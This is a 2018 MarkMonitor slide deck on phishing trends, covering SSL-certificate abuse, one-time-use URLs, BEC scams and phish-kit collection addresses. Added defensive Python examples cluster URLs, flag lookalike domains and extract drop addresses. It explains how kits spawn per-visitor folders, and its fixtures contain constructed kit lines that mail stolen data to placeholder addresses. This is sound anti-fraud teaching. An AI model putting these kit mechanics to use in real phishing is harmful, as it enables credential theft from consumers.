The Top 3 Trends in Phishing Right Now
Stefanie Ellis
Portfolio Marketing Manager
AntiFraud Services
MarkMonitor
What are the 2018 cybercrime trends?
What we’re talking about today
Most common phishing trends for 2018:
• SSL Certs used in phishing
• One-time use URLs
• BEC scams/spearphishing increasing
Proactive approach to disrupting a phisher’s business:
• Collection point email address usage across multiple phish kits
Q&A
With the many data leaks of 2016 and 2017, sophisticated phishing and spear phishing attacks must be expected.
Vade Secure, https://www.vadesecure.com/en/cybersecurity-4-trends-watch-2018/
SSL Certs Used in Phishing
Trend #1
What is an SSL/TLS Cert?
• SSL (Secure Sockets Layer) and TLS (Transport Layer Security) are the names for the technology used to encrypt a communication channel between a web server and a browser
• Their purpose is to keep transmitted data private, protect users, and serve as an industry standard
• SSL/TLS certs are purchased from a certificate authority (CA)
Types of certs
• Domain Validation (DV) validates that the applicant has control of the domain
• Organization Validation (OV) additionally validates the organization’s identity
• Extended Validation (EV) is the financial/ecommerce standard
https://www.digicert.com/news/choosing-an-ssl-tls-certificate/
What do consumers think of SSL Certs?
Responses from an informal poll question for non-industry folks:
“What does the padlock or the word ‘secure’ mean in the address bar?”
• “I don’t know”
• “It means the website I’m visiting is secure”
• “It’s why there is an ‘s’ in https.”
False assumptions:
• The site is legitimate and secure
• Our communication with the website is secure/encrypted AND protected
• Only legitimate organizations can purchase an SSL Cert
SSL Certs do not protect against phishing
• Services like Let’s Encrypt and Comodo provide short term domain certs for FREE
• This lends legitimacy to websites for consumers
https://www.zscaler.com/blogs/research/february-2018-zscaler-ssl-threat-report
MarkMonitor detections
• Volume of MarkMonitor-detected, validated phishing sites with SSL Certs: 260% increase in 12 months
• In Fall 2017 MarkMonitor added a new detection feed focused on new SSL/TLS certs
What is the impact?
• Increase in losses due to more victims
• Huge increase in certs and malicious domain registrations
• Impact corresponds to GDPR — measuring in relation to SSL may be difficult
• Distrust of SSL/TLS from consumers and/or increased awareness
One-Time Use URLs
Trend #2
What are one-time use URLs?
• Phishing sites that spawn multiple unique URLs intended for only one recipient, or a “one-time use”
• All domains are legitimate, but have been compromised to host phishing content:
How does it work?
The root of the phishing site auto-generates a unique path for each visitor:
• Line 22 is the name of the source folder: $src="ok"
• Line 23 copies the “ok” folder into a randomly named folder
• Line 24 redirects the visitor to the new folder/site
How does this affect compliance?
• Going to the root phishing site will generate a new URL, so proof shouldn’t be too much of a challenge
• Enforcement will need to go to the host for the source folder and will knock out all unique URLs
• Clustering reduces shutdown effort; however, at MarkMonitor, each URL is Fraudcasted for consumer blocking
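One way to do the clustering the two slides above describe, as an added example that is not part of the original deck or MarkMonitor’s tooling: detected one-time URLs are normalized by replacing the random per-visitor folder name with a wildcard, so every URL spawned from the same source folder lands in one cluster whose root is the host and base path an enforcement request has to target. It assumes the random folder names are 32 hex characters; hostnames and tokens in the sample feed are constructed placeholders.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Assumption: the per-visitor copy of the source folder gets a 32-hex-char
# (MD5-style) name, as in the paths shown on the slide.
TOKEN_RE = re.compile(r"^[0-9a-f]{32}$", re.IGNORECASE)

def refang(url):
    """Turn a defanged hxxp(s):// URL back into something urlparse understands."""
    return re.sub(r"^hxxp", "http", url, flags=re.IGNORECASE)

def cluster_root(url):
    """Return (host, base_path) with per-visitor token segments replaced by '*'.

    The base path is where the kit's source folder lives; removing that folder
    knocks out every one-time URL generated from it. Scheme is ignored so
    http/https variants of the same site cluster together.
    """
    p = urlparse(refang(url))
    host = (p.hostname or "").lower()
    segments = [s for s in p.path.split("/") if s]
    normalized = ["*" if TOKEN_RE.match(s) else s for s in segments]
    return host, "/" + "/".join(normalized)

def cluster_urls(urls):
    """Group detected URLs by cluster root (deduplicating repeat reports)."""
    clusters = defaultdict(set)
    for u in urls:
        clusters[cluster_root(u)].add(refang(u))
    return clusters

def summarize(urls):
    """Unique URL vs. unique domain counts, plus the size of each cluster."""
    clusters = cluster_urls(urls)
    return {
        "unique_urls": len({refang(u) for u in urls}),
        "unique_domains": len({host for host, _ in clusters}),
        "clusters": {f"{h}{path}": len(m) for (h, path), m in clusters.items()},
    }

# Constructed sample feed; hostnames and tokens are placeholders, not real detections.
SAMPLE_URLS = [
    "hxxp://compromised-example.test/vendor/signin/0123456789abcdef0123456789abcdef/",
    "hxxp://compromised-example.test/vendor/signin/fedcba9876543210fedcba9876543210/",
    "hxxp://compromised-example.test/vendor/signin/fedcba9876543210fedcba9876543210/",
    "hxxps://other-example.test/wp-admin/kit/00112233445566778899aabbccddeeff/",
    "hxxp://other-example.test/wp-admin/kit/ffeeddccbbaa99887766554433221100/",
]
```

Run over a real detection feed, the unique_urls and unique_domains counts are the two series the next slide’s chart plots, and each cluster key is one shutdown request.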
URL vs. Domain Detections
[Chart: URLs vs Domains, y-axis 0 to 60,000; series: ALL Detections and Unique Domains, each with a linear trend line]
What is the impact?
• Another obfuscation technique by phishers
• An indication of increased sophistication
• Makes compliance more challenging – but not impossible
• At MarkMonitor:
o All URLs are logged for Fraudcasting for consumer blocking
o Shutdowns are at the domain level to cluster mitigation efforts
BEC/Spearphishing Scams
Trend #3
What are BEC/EAC/employee spearphishing scams?
• Business Email Compromise (BEC) and Email Account Compromise (EAC) scams often target businesses that perform wire transfers.
• Also known as Executive Impersonation: an impersonated executive requests an illegitimate wire transfer in a direct spearphishing attempt against an employee.
• HR/Payroll scams: an executive is impersonated to steal employee tax records.
• IC3 reports that BEC/EAC-type fraud can also include email-based scams related to romance, lottery, employment, and rentals.
• Employment scams often relate to “money mule” jobs used in “laundering” money obtained illegally, often through phishing sites.
BEC Scams/Employee spearphishing are NOT going away
• January 2015 to December 2016: 2,370% increase in identified, exposed losses
• Reported to IC3 between October 2013 and December 2016:
o Domestic and international incidents: 40,203
o Domestic and international exposed dollar loss: $5,302,890,448
• The following BEC/EAC statistics were reported in victim complaints to the IC3 from October 2013 to December 2016:
o Total U.S. victims: 22,292
o Total U.S. exposed dollar loss: $1,594,503,669
https://www.ic3.gov/media/2017/170504.aspx
What is the impact?
• More data breaches
• Early awareness of lookalike domain registrations is helpful for email blocking or re-routing
• Employee education and awareness is paramount
• Additional checks and balances so that a single employee cannot initiate payable changes or a wire transfer on their own
• Recommend hitting “forward” so the recipient email address has to be typed in, rather than hitting “reply”, in case the sender is a lookalike email address
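The “early awareness of lookalike domain registrations” point above, and the new-cert detection feed from Trend #1, both come down to triaging a stream of newly seen domains against the brands you protect. The following is an added example, not code from the deck or from MarkMonitor: it flags same-name/different-TLD, homoglyph, brand-containing and near-typo domains. The protected domain, the confusable table and the two-label registrable-domain rule are assumptions made for the example.

```python
# Assumption: the organization's own registrable domains (constructed for this example).
PROTECTED = {"markmonitor.com"}
# Common substitutions seen in lookalikes; constructed, not exhaustive.
CONFUSABLES = {"0": "o", "1": "l", "3": "e", "5": "s", "rn": "m", "vv": "w"}

def normalize(label):
    """Fold digit/letter-pair confusables so rnark -> mark, 0 -> o, etc."""
    label = label.lower()
    for src, dst in CONFUSABLES.items():
        label = label.replace(src, dst)
    return label

def edit_distance(a, b):
    """Levenshtein distance via a rolling single-row DP."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def registrable(domain):
    """Assumption: last two labels form the registrable domain (no public-suffix list)."""
    return ".".join(domain.lower().strip(".").split(".")[-2:])

def lookalike_reason(candidate, protected=PROTECTED):
    """Why `candidate` resembles a protected domain, or None if it does not."""
    cand = registrable(candidate)
    if cand in protected:
        return None  # the real domain, or a subdomain of it
    cand_label = cand.split(".")[0]
    for p in sorted(protected):
        p_label = p.split(".")[0]
        if cand_label == p_label:
            return f"same name, different TLD than {p}"
        if normalize(cand_label) == normalize(p_label):
            return f"homoglyph of {p}"
        if p_label in cand_label:
            return f"contains {p_label}"
        if edit_distance(cand_label, p_label) <= 2:
            return f"typo of {p} (edit distance <= 2)"
    return None

def triage(new_domains, protected=PROTECTED):
    """Reduce a registration or new-certificate feed to entries worth review."""
    reasons = ((d, lookalike_reason(d, protected)) for d in new_domains)
    return {d: r for d, r in reasons if r}
```

Flagged entries are candidates for mail-gateway blocking or re-routing rules and for a registrar/CA complaint, not automatic proof of abuse.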
Collection Point Email Addresses
Let’s be proactive!
Phish Kit harvesting makes your organization a harder target
• Phish Kit fingerprinting categorizes kits into families and expedites future handling of similar phish
• Email collection point detection & mitigation can prevent access to stolen credentials
• Exploit detection can expedite takedowns and uncover hidden data
What does it look like?
The collection point email address is embedded in the phish kit:
• Line 29 has the email address
• Line 34 calls the mail function to send the collected info to the phisher
• Upon success, line 37 redirects the visitor to the legitimate site
Why is knowing the Collection Point address helpful?
• Shutting down the phisher’s collection point can protect your consumers’ PII
• Collection points are often reused or used concurrently across multiple phish kits
• It can also disrupt their other business interests; some phishers use the email addresses for other business correspondence
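An added example for the two slides above (not code from the deck or from MarkMonitor) of how a takedown team can pull the collection point address out of harvested kit sources and cross-reference it across kits, so that the mailboxes reused by several campaigns surface first. The kit fragments are constructed and reduced to the lines the slide describes (address assignment, mail() call, redirect); all addresses and hostnames are placeholders.

```python
import re
from collections import defaultdict

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# \b keeps "webmail(" or "sendmail(" from counting as a mail() call.
MAIL_CALL_RE = re.compile(r"\bmail\s*\(", re.IGNORECASE)

def collection_points(kit_source):
    """Return the lowercased email addresses a kit sends harvested data to.

    Heuristic: addresses only count when the source also calls mail(); a page
    that merely displays an address (fake support footer) yields nothing.
    """
    if not MAIL_CALL_RE.search(kit_source):
        return set()
    return {addr.lower() for addr in EMAIL_RE.findall(kit_source)}

def index_collection_points(kits):
    """Map each collection address to the identifiers of the kits using it."""
    index = defaultdict(set)
    for kit_id, source in kits.items():
        for addr in collection_points(source):
            index[addr].add(kit_id)
    return index

def shared_collection_points(kits):
    """Addresses reused across more than one kit. Getting one of these mailboxes
    closed disrupts every campaign that drops credentials into it."""
    index = index_collection_points(kits)
    return {addr: ids for addr, ids in index.items() if len(ids) > 1}

# Constructed kit fragments, reduced to the lines the slide describes: the
# address assignment, the mail() call and the redirect. Addresses are placeholders.
KITS = {
    "kit-bank-A": '$to = "drop1@mail.example";\nmail($to, "Result", $msg);\n'
                  'header("Location: https://bank.example/");',
    "kit-bank-B": '$to = "drop1@mail.example"; $cc = "drop2@mail.example";\n'
                  'mail($to, "Result", $msg); mail($cc, "Result", $msg);',
    "kit-webmail-C": '$to = "drop2@mail.example";\nmail($to, "Login", $msg);',
    "static-page": "<p>Contact support@bank.example for help</p>",
}
```

Real kits often obfuscate or concatenate the address, so in practice this regex pass is a first triage step ahead of manual review of the kit family.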
Summary
Takeaways
SSL Certs can be misused
o Confusing to the consumer
o Could cause increased losses
One-time use URLs prevalent
o Unique URL volumes high, but unique domains mostly flat
o We’ll see an increase in unique domains following GDPR
o Enforcement is slightly more complicated, but compliance should be okay
BEC scams not going away
o Targeted attacks are lucrative
o Employee education and internal processes are most important to make attacks ineffective
o Watch domain registrations
Phish Kits & Collection Points are important
o Using phish kit collection to identify and shut down collection points makes an organization a harder target
o Being proactive is the opposite of whack-a-mole
Mike Tyson has said, “Everybody has a plan until they get punched in the mouth.”
Q&A
Thank you!
Stefanie Ellis
Portfolio Marketing Manager
AntiFraud Services
MarkMonitor